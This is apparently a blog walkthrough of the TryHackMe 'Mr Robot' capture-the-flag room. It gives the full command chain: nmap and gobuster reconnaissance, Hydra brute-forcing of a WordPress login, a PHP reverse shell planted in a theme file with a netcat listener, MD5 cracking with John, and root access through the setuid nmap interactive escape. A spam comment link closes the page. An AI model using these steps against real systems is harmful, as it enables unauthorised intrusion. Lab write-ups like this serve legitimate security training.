Mr Robot CTF |
Connection to network
Connected to tryhackme network using provided vpn configuration
Nmap Scan
nmap -sC -sV **.**.*.*** -v | tee nmap/inital
Results
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_ Supported Methods: HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
| http-methods:
|_ Supported Methods: HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Issuer: commonName=www.example.com
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015-09-16T10:45:03
| Not valid after: 2025-09-13T10:45:03
| MD5: 3c16 3b19 87c3 42ad 6634 c1c9 d0aa fb97
|_SHA-1: ef0c 5fa5 931a 09a5 687c a2c2 80c4 c792 07ce f71b
Directory brute force using go-buster
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u **.**.*.***
Nothing else interesting except that admin
and login
part. Seems juicy! Lets check them.
http://**.**.*.***/login
redirects to http://**.**.*.***/wp-login.php
and it’s WordPress admin authentication page. So, considering the word-list file we found earlier, we need to brute force out way in using that file. Maybe both username and passwords are from this same file and we don’t have to use rock-you.
I used HYDRA to bruteforce username. Since bruteforcing both username and password parallely is not practical, looking at the incorrect login attempt we are notified that only the USERNAME is not correct. Hmm, so we can bruteforce to see if a username from dic file has correct username.
-$ sudo hydra -L fsociety.dic -p test **.**.*.*** http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^: Invalid username."
And it returned a response with a username that exists for login.
Now, I brute-force again with username we’ve found but using that dic
file to try passwords for this username.
-$ sudo hydra -l Elliot -P fsociety.dic **.**.*.*** http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^: The password you entered for the username"
Man this is taking a lot of time. What’s going on? I even tried rockyou.txt but doesn’t work. Then I took a look at the dat
file and I saw that passwords seem to occur more than once. Maybe that’s why it’s taking so long. Let’s filter the file with only unique items and try again.
-$ cat fsociety.dic | sort -u | uniq > filtered.dic
-$ sudo hydra -l Elliot -P filtered.dic **.**.*.*** http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^: The password you entered for the username"
After an hour, finnaly my hydra babe got hit the passcode.
Upon login we see a wordpress admin panel where we can upload files. Hmm upload files. Nicccce! Lets try uploading a reverse shell.
I tried uploading php reverse shell as a media file but didn't work. Combination like .php5, .php.jpg ( literally presented as image upon access although got uploaded), So, looked for other options. Then I found different php files under themes. Look at that, revshell was already there and I coultn't see it. I then chose one of the *.php extentioned theme file and replaced the code with that of revshell.
Then I started a netcat listener as:
-nc -lvp 1234
And opened that part of theme from browser. And boom, a connection was received with non interactive rev-shell.
Upon ls
ing I saw two files under /home/robots.
- key - accessible only by
robot
user - random raw-md5 hashed password file which seems to be of that
robot
user.
Cracking md5 with John The Ripper
-john --format=raw-md5 --wordlist=rockyou.txt <hashfile>
Found it!
Escalating to user robot
su
ing into robot is not possible with non interactinve shell. Let's make our shell a bit interactive.
##Making interactive shell with python
-python -c 'import pty;pty.spawn("/bin/sh");'
Going robot
-su robot
Now I can access the second key as I have read permission.
Escalating to root
Finding escalation vector
I just used Linpeas and found that Nmap is setuid executable. So, nice.
-nmap --interactive
-!sh
Nice! I'm root now. Now we can read the final key under /root directory if it exists, as:
-cat /root/key-3-of-3.txt
1 Comments
Wau amazing but I don't care. https://docs.google.com/presentation/d/e/2PACX-1vTCzAoOudJnjQA8TlEWP0I1P1QYaQzrWwIJBuPZvzacBcfVaFj_7Ltt0TJcHNTwmI7XBAvJjwUImiw1/pub?start=true&loop=false&delayms=3000
ReplyDelete